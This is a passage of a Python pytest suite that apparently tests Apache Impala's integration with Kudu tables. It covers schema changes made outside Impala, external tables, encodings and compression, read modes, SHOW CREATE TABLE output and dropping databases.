assert kudu_client.table_exists(
KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
# Force metadata to be loaded on impalads
cursor.execute("select * from %s.foo" % (unique_database))
# Load the table via the Kudu client and add a new col
table = kudu_client.table(KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
alterer = kudu_client.new_table_alterer(table)
alterer.add_column("b", "int32")
table = alterer.alter()
# Add some rows
session = kudu_client.new_session()
op = table.new_insert((0, 0))
session.apply(op)
session.flush()
# Only the first col is visible to Impala. Impala will not know about the missing
# column, so '*' is expanded to known columns. This doesn't have a separate check
# because the query can proceed and checking would need to fetch metadata from the
# Kudu master, which is what REFRESH is for.
cursor.execute("SELECT * FROM %s.foo" % (unique_database))
assert cursor.fetchall() == [(0, )]
# After a REFRESH both cols should be visible
cursor.execute("REFRESH %s.foo" % (unique_database))
cursor.execute("SELECT * FROM %s.foo" % (unique_database))
assert cursor.fetchall() == [(0, 0)]
@SkipIfKudu.no_hybrid_clock
@SkipIfKudu.hms_integration_enabled
def test_kudu_col_removed(self, cursor, kudu_client, unique_database):
"""Test removing a Kudu column outside of Impala."""
cursor.execute("set kudu_read_mode=READ_AT_SNAPSHOT")
cursor.execute("""CREATE TABLE %s.foo (a INT PRIMARY KEY, s STRING)
PARTITION BY HASH(a) PARTITIONS 3 STORED AS KUDU""" % unique_database)
assert kudu_client.table_exists(
KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
# Force metadata to be loaded on impalads
cursor.execute("select * from %s.foo" % (unique_database))
cursor.execute("insert into %s.foo values (0, 'foo')" % (unique_database))
# Load the table via the Kudu client and change col 's' to be a different type.
table = kudu_client.table(KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
alterer = kudu_client.new_table_alterer(table)
alterer.drop_column("s")
table = alterer.alter()
# Scanning should result in an error
try:
cursor.execute("SELECT * FROM %s.foo" % (unique_database))
except Exception as e:
expected_error = "Column 's' not found in kudu table impala::test_kudu_col_removed"
assert expected_error in str(e)
# After a REFRESH the scan should succeed
cursor.execute("REFRESH %s.foo" % (unique_database))
cursor.execute("SELECT * FROM %s.foo" % (unique_database))
assert cursor.fetchall() == [(0, )]
def test_kudu_show_unbounded_range_partition(self, cursor, kudu_client,
unique_database):
"""Check that a single unbounded range partition gets printed correctly."""
schema_builder = SchemaBuilder()
column_spec = schema_builder.add_column("id", INT64)
column_spec.nullable(False)
schema_builder.set_primary_keys(["id"])
schema = schema_builder.build()
name = unique_database + ".unbounded_range_table"
try:
kudu_client.create_table(name, schema,
partitioning=Partitioning().set_range_partition_columns(["id"]))
kudu_table = kudu_client.table(name)
impala_table_name = self.get_kudu_table_base_name(kudu_table.name)
props = "TBLPROPERTIES('kudu.table_name'='%s')" % kudu_table.name
cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (impala_table_name,
props))
with self.drop_impala_table_after_context(cursor, impala_table_name):
cursor.execute("SHOW RANGE PARTITIONS %s" % impala_table_name)
assert cursor.description == [
('RANGE (id)', 'STRING', None, None, None, None, None)]
assert cursor.fetchall() == [('UNBOUNDED',)]
finally:
if kudu_client.table_exists(name):
kudu_client.delete_table(name)
@SkipIfKudu.no_hybrid_clock
def test_column_storage_attributes(self, cursor, unique_database):
"""Tests that for every valid combination of column type, encoding, and compression,
we can insert a value and scan it back from Kudu."""
# This test takes about 2min and is unlikely to break, so only run it in exhaustive.
if self.exploration_strategy() != 'exhaustive':
pytest.skip("Only runs in exhaustive to reduce core time.")
table_name = "%s.storage_attrs" % unique_database
types = ['boolean', 'tinyint', 'smallint', 'int', 'bigint', 'float', 'double', \
'string', 'timestamp', 'decimal']
cursor.execute("set kudu_read_mode=READ_AT_SNAPSHOT")
create_query = "create table %s (id int primary key" % table_name
for t in types:
create_query += ", %s_col %s" % (t, t)
create_query += ") partition by hash(id) partitions 16 stored as kudu"
cursor.execute(create_query)
encodings = ['AUTO_ENCODING', 'PLAIN_ENCODING', 'PREFIX_ENCODING', 'GROUP_VARINT', \
'RLE', 'DICT_ENCODING', 'BIT_SHUFFLE']
compressions = ['DEFAULT_COMPRESSION', 'NO_COMPRESSION', 'SNAPPY', 'LZ4', 'ZLIB']
i = 0
for e in encodings:
for c in compressions:
for t in types:
try:
cursor.execute("""alter table %s alter column %s_col
set encoding %s compression %s""" % (table_name, t, e, c))
except Exception as err:
assert "encoding %s not supported for type" % e in str(err)
cursor.execute("""insert into %s values (%s, true, 0, 0, 0, 0, 0, 0, '0',
cast('2009-01-01' as timestamp), cast(0 as decimal))""" % (table_name, i))
cursor.execute("select * from %s where id = %s" % (table_name, i))
assert cursor.fetchall() == \
[(i, True, 0, 0, 0, 0, 0.0, 0.0, '0', datetime(2009, 1, 1, 0, 0), 0)]
i += 1
cursor.execute("select count(*) from %s" % table_name)
    assert cursor.fetchall() == [(i, )]
def test_concurrent_schema_change(self, cursor, unique_database):
"""Tests that an insert into a Kudu table with a concurrent schema change either
succeeds or fails gracefully."""
table_name = "%s.test_schema_change" % unique_database
cursor.execute("""create table %s (col0 bigint primary key, col1 bigint)
partition by hash(col0) partitions 16 stored as kudu""" % table_name)
iters = 5
def insert_values():
threading.current_thread().errors = []
client = self.create_impala_client()
for i in range(0, iters):
time.sleep(random.random()) # sleeps for up to one second
try:
client.execute("insert into %s values (0, 0), (1, 1)" % table_name)
except Exception as e:
threading.current_thread().errors.append(e)
insert_thread = threading.Thread(target=insert_values)
insert_thread.start()
for i in range(0, iters):
time.sleep(random.random()) # sleeps for up to one second
cursor.execute("alter table %s drop column col1" % table_name)
if i % 2 == 0:
cursor.execute("alter table %s add columns (col1 string)" % table_name)
else:
cursor.execute("alter table %s add columns (col1 bigint)" % table_name)
insert_thread.join()
for error in insert_thread.errors:
msg = str(error)
# The first two are AnalysisExceptions, the next two come from KuduTableSink::Open()
# if the schema has changed since analysis, the rest come from the Kudu server if
# the schema changes between KuduTableSink::Open() and when the write ops are sent.
possible_errors = [
"has fewer columns (1) than the SELECT / VALUES clause returns (2)",
"(type: TINYINT) is not compatible with column 'col1' (type: STRING)",
"has fewer columns than expected.",
"Column col1 has unexpected type.",
"Client provided column col1[int64 NULLABLE] not present in tablet",
"Client provided column col1 INT64 NULLABLE not present in tablet",
"The column 'col1' must have type string NULLABLE found int64 NULLABLE"
]
assert any(err in msg for err in possible_errors)
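  # Re-runs 'query' up to 3 times, sleeping one second between attempts, until the
  # result matches 'expected'. Used by the READ_LATEST test below, where a scan may
  # briefly lag recent writes.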
def _retry_query(self, cursor, query, expected):
retries = 0
while retries < 3:
cursor.execute(query)
result = cursor.fetchall()
if result == expected:
break
retries += 1
time.sleep(1)
assert retries < 3, \
"Did not get a correct result for %s after 3 retries: %s" % (query, result)
def test_read_modes(self, cursor, unique_database):
"""Other Kudu tests are run with a scan level of READ_AT_SNAPSHOT to have predicable
scan results. This test verifies that scans work as expected at the scan level of
READ_LATEST by retrying the scan if the results are incorrect."""
table_name = "%s.test_read_latest" % unique_database
cursor.execute("set kudu_read_mode=READ_LATEST")
cursor.execute("""create table %s (a int primary key, b string) partition by hash(a)
partitions 8 stored as kudu""" % table_name)
cursor.execute("insert into %s values (0, 'a'), (1, 'b'), (2, 'c')" % table_name)
self._retry_query(cursor, "select * from %s order by a" % table_name,
[(0, 'a'), (1, 'b'), (2, 'c')])
cursor.execute("""insert into %s select id, string_col from functional.alltypes
where id > 2 limit 100""" % table_name)
self._retry_query(cursor, "select count(*) from %s" % table_name, [(103,)])
class TestCreateExternalTable(KuduTestSuite):
@SkipIfKudu.hms_integration_enabled
def test_external_timestamp_default_value(self, cursor, kudu_client, unique_database):
"""Checks that a Kudu table created outside Impala with a default value on a
UNIXTIME_MICROS column can be loaded by Impala, and validates the DESCRIBE
output is correct."""
schema_builder = SchemaBuilder()
column_spec = schema_builder.add_column("id", INT64)
column_spec.nullable(False)
column_spec = schema_builder.add_column("ts", UNIXTIME_MICROS)
column_spec.default(datetime(2009, 1, 1, 0, 0, tzinfo=utc))
schema_builder.set_primary_keys(["id"])
schema = schema_builder.build()
name = unique_database + ".tsdefault"
try:
kudu_client.create_table(name, schema,
partitioning=Partitioning().set_range_partition_columns(["id"]))
kudu_table = kudu_client.table(name)
impala_table_name = self.get_kudu_table_base_name(kudu_table.name)
props = "TBLPROPERTIES('kudu.table_name'='%s')" % kudu_table.name
cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (impala_table_name,
props))
with self.drop_impala_table_after_context(cursor, impala_table_name):
cursor.execute("DESCRIBE %s" % impala_table_name)
table_desc = [[col.strip() if col else col for col in row] for row in cursor]
# Pytest shows truncated output on failure, so print the details just in case.
LOG.info(table_desc)
assert ["ts", "timestamp", "", "false", "true", "1230768000000000", \
"AUTO_ENCODING", "DEFAULT_COMPRESSION", "0"] in table_desc
finally:
if kudu_client.table_exists(name):
kudu_client.delete_table(name)
@SkipIfKudu.hms_integration_enabled
def test_implicit_table_props(self, cursor, kudu_client):
"""Check that table properties added internally during table creation are as
expected.
"""
with self.temp_kudu_table(kudu_client, [STRING, INT8, BOOL], num_key_cols=2) \
as kudu_table:
impala_table_name = self.get_kudu_table_base_name(kudu_table.name)
props = "TBLPROPERTIES('kudu.table_name'='%s')" % kudu_table.name
cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (impala_table_name,
props))
with self.drop_impala_table_after_context(cursor, impala_table_name):
cursor.execute("DESCRIBE FORMATTED %s" % impala_table_name)
table_desc = [[col.strip() if col else col for col in row] for row in cursor]
        # Pytest shows truncated output on failure, so print the details just in case.
        LOG.info(table_desc)
assert ["", "EXTERNAL", "TRUE"] in table_desc
assert ["", "kudu.master_addresses", KUDU_MASTER_HOSTS] in table_desc
assert ["", "kudu.table_name", kudu_table.name] in table_desc
assert ["", "storage_handler", "org.apache.hadoop.hive.kudu.KuduStorageHandler"] \
in table_desc
@SkipIfKudu.hms_integration_enabled
def test_col_types(self, cursor, kudu_client):
"""Check that a table can be created using all available column types."""
# TODO: Add DECIMAL when the Kudu python client supports decimal
kudu_types = [STRING, BOOL, DOUBLE, FLOAT, INT16, INT32, INT64, INT8]
with self.temp_kudu_table(kudu_client, kudu_types) as kudu_table:
impala_table_name = self.get_kudu_table_base_name(kudu_table.name)
props = "TBLPROPERTIES('kudu.table_name'='%s')" % kudu_table.name
cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (impala_table_name,
props))
with self.drop_impala_table_after_context(cursor, impala_table_name):
cursor.execute("DESCRIBE %s" % impala_table_name)
kudu_schema = kudu_table.schema
for i, (col_name, col_type, _, _, _, _, _, _, _) in enumerate(cursor):
kudu_col = kudu_schema[i]
assert col_name == kudu_col.name
assert col_type.upper() == \
self.kudu_col_type_to_impala_col_type(kudu_col.type.type)
@SkipIfKudu.hms_integration_enabled
def test_unsupported_binary_col(self, cursor, kudu_client):
"""Check that external tables with BINARY columns fail gracefully.
"""
with self.temp_kudu_table(kudu_client, [INT32, BINARY]) as kudu_table:
impala_table_name = self.random_table_name()
try:
cursor.execute("""
CREATE EXTERNAL TABLE %s
STORED AS KUDU
TBLPROPERTIES('kudu.table_name' = '%s')""" % (impala_table_name,
kudu_table.name))
assert False
except Exception as e:
assert "Kudu type 'binary' is not supported in Impala" in str(e)
@SkipIfKudu.hms_integration_enabled
def test_drop_external_table(self, cursor, kudu_client):
"""Check that dropping an external table only affects the catalog and does not delete
the table in Kudu.
"""
with self.temp_kudu_table(kudu_client, [INT32]) as kudu_table:
impala_table_name = self.get_kudu_table_base_name(kudu_table.name)
props = "TBLPROPERTIES('kudu.table_name'='%s')" % kudu_table.name
cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (impala_table_name,
props))
with self.drop_impala_table_after_context(cursor, impala_table_name):
cursor.execute("SELECT COUNT(*) FROM %s" % impala_table_name)
assert cursor.fetchall() == [(0, )]
try:
cursor.execute("SELECT COUNT(*) FROM %s" % impala_table_name)
assert False
except Exception as e:
assert "Could not resolve table reference" in str(e)
assert kudu_client.table_exists(kudu_table.name)
@SkipIfKudu.hms_integration_enabled
def test_explicit_name(self, cursor, kudu_client):
"""Check that a Kudu table can be specified using a table property."""
with self.temp_kudu_table(kudu_client, [INT32]) as kudu_table:
table_name = self.random_table_name()
cursor.execute("""
CREATE EXTERNAL TABLE %s
STORED AS KUDU
TBLPROPERTIES('kudu.table_name' = '%s')""" % (table_name, kudu_table.name))
with self.drop_impala_table_after_context(cursor, table_name):
cursor.execute("SELECT * FROM %s" % table_name)
assert len(cursor.fetchall()) == 0
@SkipIfKudu.hms_integration_enabled
def test_explicit_name_preference(self, cursor, kudu_client):
"""Check that the table name from a table property is used when a table of the
implied name also exists.
"""
with self.temp_kudu_table(kudu_client, [INT64]) as preferred_kudu_table:
with self.temp_kudu_table(kudu_client, [INT8]) as other_kudu_table:
impala_table_name = self.get_kudu_table_base_name(other_kudu_table.name)
cursor.execute("""
CREATE EXTERNAL TABLE %s
STORED AS KUDU
TBLPROPERTIES('kudu.table_name' = '%s')""" % (
impala_table_name, preferred_kudu_table.name))
with self.drop_impala_table_after_context(cursor, impala_table_name):
cursor.execute("DESCRIBE %s" % impala_table_name)
assert cursor.fetchall() == \
[("a", "bigint", "", "true", "false", "", "AUTO_ENCODING",
"DEFAULT_COMPRESSION", "0")]
@SkipIfKudu.hms_integration_enabled
def test_explicit_name_doesnt_exist(self, cursor, kudu_client):
kudu_table_name = self.random_table_name()
try:
cursor.execute("""
CREATE EXTERNAL TABLE %s
STORED AS KUDU
TBLPROPERTIES('kudu.table_name' = '%s')""" % (
self.random_table_name(), kudu_table_name))
assert False
except Exception as e:
assert "Table does not exist in Kudu: '%s'" % kudu_table_name in str(e)
@SkipIfKudu.hms_integration_enabled
def test_explicit_name_doesnt_exist_but_implicit_does(self, cursor, kudu_client):
"""Check that when an explicit table name is given but that table doesn't exist,
there is no fall-through to an existing implicit table.
"""
with self.temp_kudu_table(kudu_client, [INT32]) as kudu_table:
table_name = self.random_table_name()
try:
cursor.execute("""
CREATE EXTERNAL TABLE %s
STORED AS KUDU
TBLPROPERTIES('kudu.table_name' = '%s')""" % (
self.get_kudu_table_base_name(kudu_table.name), table_name))
assert False
except Exception as e:
assert "Table does not exist in Kudu: '%s'" % table_name in str(e)
@SkipIfKudu.no_hybrid_clock
@SkipIfKudu.hms_integration_enabled
def test_table_without_partitioning(self, cursor, kudu_client, unique_database):
"""Test a Kudu table created without partitioning (i.e. equivalent to a single
unbounded partition). It is not possible to create such a table in Impala, but
it can be created directly in Kudu and then loaded as an external table.
Regression test for IMPALA-5154."""
cursor.execute("set kudu_read_mode=READ_AT_SNAPSHOT")
schema_builder = SchemaBuilder()
column_spec = schema_builder.add_column("id", INT64)
column_spec.nullable(False)
schema_builder.set_primary_keys(["id"])
schema = schema_builder.build()
partitioning = Partitioning().set_range_partition_columns([])
name = "%s.one_big_unbounded_partition" % unique_database
try:
kudu_client.create_table(name, schema, partitioning=partitioning)
kudu_table = kudu_client.table(name)
props = "TBLPROPERTIES('kudu.table_name'='%s')" % name
cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (name, props))
with self.drop_impala_table_after_context(cursor, name):
cursor.execute("INSERT INTO %s VALUES (1), (2), (3)" % name)
cursor.execute("SELECT COUNT(*) FROM %s" % name)
assert cursor.fetchall() == [(3, )]
try:
cursor.execute("SHOW RANGE PARTITIONS %s" % name)
assert False
except Exception as e:
assert "AnalysisException: SHOW RANGE PARTITIONS requested but table does "\
"not have range partitions" in str(e)
finally:
if kudu_client.table_exists(name):
kudu_client.delete_table(name)
@SkipIfKudu.no_hybrid_clock
@SkipIfKudu.hms_integration_enabled
def test_column_name_case(self, cursor, kudu_client, unique_database):
"""IMPALA-5286: Tests that an external Kudu table that was created with a column name
containing upper case letters is handled correctly."""
cursor.execute("set kudu_read_mode=READ_AT_SNAPSHOT")
table_name = '%s.kudu_external_test' % unique_database
if kudu_client.table_exists(table_name):
kudu_client.delete_table(table_name)
schema_builder = SchemaBuilder()
key_col = 'Key'
schema_builder.add_column(key_col, INT64).nullable(False).primary_key()
schema = schema_builder.build()
partitioning = Partitioning().set_range_partition_columns([key_col])\
.add_range_partition([1], [10])
try:
kudu_client.create_table(table_name, schema, partitioning)
props = "tblproperties('kudu.table_name' = '%s')" % table_name
cursor.execute("create external table %s stored as kudu %s" % (table_name, props))
# Perform a variety of operations on the table.
cursor.execute("insert into %s (kEy) values (5), (1), (4)" % table_name)
cursor.execute("select keY from %s where KeY %% 2 = 0" % table_name)
assert cursor.fetchall() == [(4, )]
cursor.execute("select * from %s order by kEY" % (table_name))
assert cursor.fetchall() == [(1, ), (4, ), (5, )]
# Do a join with a runtime filter targeting the column.
cursor.execute("select count(*) from %s a, %s b where a.key = b.key" %
(table_name, table_name))
assert cursor.fetchall() == [(3, )]
cursor.execute("alter table %s add range partition 11 < values < 20" % table_name)
new_key = "KEY2"
cursor.execute("alter table %s change KEy %s bigint" % (table_name, new_key))
val_col = "vaL"
cursor.execute("alter table %s add columns (%s bigint)" % (table_name, val_col))
cursor.execute("describe %s" % table_name)
results = cursor.fetchall()
# 'describe' should print the column name in lower case.
assert new_key.lower() in results[0]
assert val_col.lower() in results[1]
cursor.execute("alter table %s drop column Val" % table_name);
cursor.execute("describe %s" % table_name)
assert len(cursor.fetchall()) == 1
cursor.execute("alter table %s drop range partition 11 < values < 20" % table_name)
finally:
if kudu_client.table_exists(table_name):
kudu_client.delete_table(table_name)
@SkipIfKudu.hms_integration_enabled
def test_conflicting_column_name(self, cursor, kudu_client, unique_database):
"""IMPALA-5283: Tests that loading an external Kudu table that was created with column
names that differ only in case results in an error."""
table_name = '%s.kudu_external_test' % unique_database
if kudu_client.table_exists(table_name):
kudu_client.delete_table(table_name)
schema_builder = SchemaBuilder()
col0 = 'col'
schema_builder.add_column(col0, INT64).nullable(False).primary_key()
col1 = 'COL'
schema_builder.add_column(col1, INT64)
schema = schema_builder.build()
partitioning = Partitioning().set_range_partition_columns([col0])\
.add_range_partition([1], [10])
try:
kudu_client.create_table(table_name, schema, partitioning)
props = "tblproperties('kudu.table_name' = '%s')" % table_name
cursor.execute("create external table %s stored as kudu %s" % (table_name, props))
assert False, 'create table should have resulted in an exception'
except Exception as e:
assert 'Error loading Kudu table: Impala does not support column names that ' \
+ 'differ only in casing' in str(e)
finally:
if kudu_client.table_exists(table_name):
kudu_client.delete_table(table_name)
class TestShowCreateTable(KuduTestSuite):
column_properties = "ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION"
def assert_show_create_equals(self, cursor, create_sql, show_create_sql):
"""Executes 'create_sql' to create a table, then runs "SHOW CREATE TABLE" and checks
that the output is the same as 'show_create_sql'. 'create_sql' and
'show_create_sql' can be templates that can be used with str.format(). format()
will be called with 'table' and 'db' as keyword args.
"""
format_args = {"table": self.random_table_name(), "db": cursor.conn.db_name}
cursor.execute(create_sql.format(**format_args))
cursor.execute("SHOW CREATE TABLE {table}".format(**format_args))
assert cursor.fetchall()[0][0] == \
textwrap.dedent(show_create_sql.format(**format_args)).strip()
@SkipIfKudu.hms_integration_enabled
def test_primary_key_and_distribution(self, cursor):
# TODO: Add case with BLOCK_SIZE
self.assert_show_create_equals(cursor,
"""
CREATE TABLE {table} (c INT PRIMARY KEY)
PARTITION BY HASH (c) PARTITIONS 3 STORED AS KUDU""",
"""
CREATE TABLE {db}.{{table}} (
c INT NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
PRIMARY KEY (c)
)
PARTITION BY HASH (c) PARTITIONS 3
STORED AS KUDU
TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}')""".format(
db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS))
self.assert_show_create_equals(cursor,
"""
CREATE TABLE {table} (c INT PRIMARY KEY, d STRING NULL)
PARTITION BY HASH (c) PARTITIONS 3, RANGE (c)
(PARTITION VALUES <= 1, PARTITION 1 < VALUES <= 2,
PARTITION 2 < VALUES) STORED AS KUDU""",
"""
CREATE TABLE {db}.{{table}} (
c INT NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
d STRING NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
PRIMARY KEY (c)
)
PARTITION BY HASH (c) PARTITIONS 3, RANGE (c) (...)
STORED AS KUDU
TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}')""".format(
db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS))
self.assert_show_create_equals(cursor,
"""
CREATE TABLE {table} (c INT ENCODING PLAIN_ENCODING, PRIMARY KEY (c))
PARTITION BY HASH (c) PARTITIONS 3 STORED AS KUDU""",
"""
CREATE TABLE {db}.{{table}} (
c INT NOT NULL ENCODING PLAIN_ENCODING COMPRESSION DEFAULT_COMPRESSION,
PRIMARY KEY (c)
)
PARTITION BY HASH (c) PARTITIONS 3
STORED AS KUDU
TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}')""".format(
db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS))
self.assert_show_create_equals(cursor,
"""
CREATE TABLE {table} (c INT COMPRESSION LZ4, d STRING, PRIMARY KEY(c, d))
PARTITION BY HASH (c) PARTITIONS 3, HASH (d) PARTITIONS 3,
RANGE (c, d) (PARTITION VALUE = (1, 'aaa'), PARTITION VALUE = (2, 'bbb'))
STORED AS KUDU""",
"""
CREATE TABLE {db}.{{table}} (
c INT NOT NULL ENCODING AUTO_ENCODING COMPRESSION LZ4,
d STRING NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
PRIMARY KEY (c, d)
)
PARTITION BY HASH (c) PARTITIONS 3, HASH (d) PARTITIONS 3, RANGE (c, d) (...)
STORED AS KUDU
TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}')""".format(
db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS))
self.assert_show_create_equals(cursor,
"""
CREATE TABLE {table} (c INT, d STRING, e INT NULL DEFAULT 10, PRIMARY KEY(c, d))
PARTITION BY RANGE (c) (PARTITION VALUES <= 1, PARTITION 1 < VALUES <= 2,
PARTITION 2 < VALUES <= 3, PARTITION 3 < VALUES) STORED AS KUDU""",
"""
CREATE TABLE {db}.{{table}} (
c INT NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
d STRING NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
e INT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION DEFAULT 10,
PRIMARY KEY (c, d)
)
PARTITION BY RANGE (c) (...)
STORED AS KUDU
TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}')""".format(
db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS))
self.assert_show_create_equals(cursor,
"""
CREATE TABLE {table} (c INT PRIMARY KEY) STORED AS KUDU""",
"""
CREATE TABLE {db}.{{table}} (
c INT NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
PRIMARY KEY (c)
)
STORED AS KUDU
TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}')""".format(
db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS))
self.assert_show_create_equals(cursor,
"""
CREATE TABLE {table} (c INT COMMENT 'Ab 1@' PRIMARY KEY) STORED AS KUDU""",
"""
CREATE TABLE {db}.{{table}} (
c INT NOT NULL {p} COMMENT 'Ab 1@',
PRIMARY KEY (c)
)
STORED AS KUDU
TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}')""".format(
db=cursor.conn.db_name, p=self.column_properties,
kudu_addr=KUDU_MASTER_HOSTS))
@SkipIfKudu.hms_integration_enabled
def test_timestamp_default_value(self, cursor):
create_sql_fmt = """
CREATE TABLE {table} (c INT, d TIMESTAMP,
e TIMESTAMP NULL DEFAULT CAST('%s' AS TIMESTAMP),
PRIMARY KEY(c, d))
PARTITION BY HASH(c) PARTITIONS 3
STORED AS KUDU"""
# Long lines are unfortunate, but extra newlines will break the test.
show_create_sql_fmt = """
CREATE TABLE {db}.{{table}} (
c INT NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
d TIMESTAMP NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
e TIMESTAMP NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION DEFAULT unix_micros_to_utc_timestamp(%s),
PRIMARY KEY (c, d)
)
PARTITION BY HASH (c) PARTITIONS 3
STORED AS KUDU
TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}')""".format(
db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS)
self.assert_show_create_equals(cursor,
create_sql_fmt % ("2009-01-01 00:00:00.000001000"),
show_create_sql_fmt % ("1230768000000001"))
self.assert_show_create_equals(cursor,
create_sql_fmt % ("2009-01-01 00:00:00.000001001"),
show_create_sql_fmt % ("1230768000000001"))
self.assert_show_create_equals(cursor,
create_sql_fmt % ("2009-01-01 00:00:00.000000999"),
show_create_sql_fmt % ("1230768000000001"))
@SkipIfKudu.hms_integration_enabled
def test_external_kudu_table_name_with_show_create(self, cursor, kudu_client,
unique_database):
"""Check that the generated kudu.table_name tblproperty is present with
show create table with external Kudu tables.
"""
schema_builder = SchemaBuilder()
column_spec = schema_builder.add_column("id", INT64)
column_spec.nullable(False)
schema_builder.set_primary_keys(["id"])
partitioning = Partitioning().set_range_partition_columns(["id"])
schema = schema_builder.build()
kudu_table_name = self.random_table_name()
try:
kudu_client.create_table(kudu_table_name, schema, partitioning)
kudu_table = kudu_client.table(kudu_table_name)
table_name_prop = "'kudu.table_name'='%s'" % kudu_table.name
self.assert_show_create_equals(cursor,
"""
CREATE EXTERNAL TABLE {{table}} STORED AS KUDU
TBLPROPERTIES({props})""".format(
props=table_name_prop),
"""
CREATE EXTERNAL TABLE {db}.{{table}}
STORED AS KUDU
TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}', {kudu_table})""".format(
db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS,
kudu_table=table_name_prop))
finally:
if kudu_client.table_exists(kudu_table_name):
kudu_client.delete_table(kudu_table_name)
@SkipIfKudu.hms_integration_enabled
def test_managed_kudu_table_name_with_show_create(self, cursor):
"""Check that the generated kudu.table_name tblproperty is not present with
show create table with managed Kudu tables.
"""
self.assert_show_create_equals(cursor,
"""
CREATE TABLE {table} (c INT PRIMARY KEY)
PARTITION BY HASH (c) PARTITIONS 3
STORED AS KUDU""",
"""
CREATE TABLE {db}.{{table}} (
c INT NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
PRIMARY KEY (c)
)
PARTITION BY HASH (c) PARTITIONS 3
STORED AS KUDU
TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}')""".format(
db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS))
class TestDropDb(KuduTestSuite):
@SkipIfKudu.hms_integration_enabled
def test_drop_non_empty_db(self, unique_cursor, kudu_client):
"""Check that an attempt to drop a database will fail if Kudu tables are present
and that the tables remain.
"""
db_name = unique_cursor.conn.db_name
with self.temp_kudu_table(kudu_client, [INT32], db_name=db_name) as kudu_table:
impala_table_name = self.get_kudu_table_base_name(kudu_table.name)
props = "TBLPROPERTIES('kudu.table_name'='%s')" % kudu_table.name
unique_cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (
impala_table_name, props))
unique_cursor.execute("USE DEFAULT")
try:
unique_cursor.execute("DROP DATABASE %s" % db_name)
assert False
except Exception as e:
assert "One or more tables exist" in str(e)
unique_cursor.execute("SELECT COUNT(*) FROM %s.%s" % (db_name, impala_table_name))
assert unique_cursor.fetchall() == [(0, )]
@SkipIfKudu.hms_integration_enabled
def test_drop_db_cascade(self, unique_cursor, kudu_client):
"""Check that an attempt to drop a database will succeed even if Kudu tables are
present and that the managed tables are removed.
"""
db_name = unique_cursor.conn.db_name
with self.temp_kudu_table(kudu_client, [INT32], db_name=db_name) as kudu_table:
# Create an external Kudu table
impala_table_name = self.get_kudu_table_base_name(kudu_table.name)
props = "TBLPROPERTIES('kudu.table_name'='%s')" % kudu_table.name
unique_cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (
impala_table_name, props))
# Create a managed Kudu table
managed_table_name = self.random_table_name()
unique_cursor.execute("""
CREATE TABLE %s (a INT PRIMARY KEY) PARTITION BY HASH (a) PARTITIONS 3
STORED AS KUDU""" % managed_table_name)
kudu_table_name = "impala::" + db_name + "." + managed_table_name
assert kudu_client.table_exists(kudu_table_name)
# Create a table in HDFS
hdfs_table_name = self.random_table_name()
unique_cursor.execute("""
CREATE TABLE %s (a INT) PARTITIONED BY (x INT)""" % (hdfs_table_name))
unique_cursor.execute("USE DEFAULT")
unique_cursor.execute("DROP DATABASE %s CASCADE" % db_name)
unique_cursor.execute("SHOW DATABASES")
assert (db_name, '') not in unique_cursor.fetchall()
assert kudu_client.table_exists(kudu_table.name)
assert not kudu_client.table_exists(managed_table_name)
class TestImpalaKuduIntegration(KuduTestSuite):
@SkipIfKudu.hms_integration_enabled
def test_replace_kudu_table(self, cursor, kudu_client):
"""Check that an external Kudu table is accessible if the underlying Kudu table is
modified using the Kudu client.
"""
# Create an external Kudu table
col_names = ['a']
with self.temp_kudu_table(kudu_client, [INT32], col_names=col_names) as kudu_table:
impala_table_name = self.get_kudu_table_base_name(kudu_table.name)
props = "TBLPROPERTIES('kudu.table_name'='%s')" % kudu_table.name
cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (
impala_table_name, props))
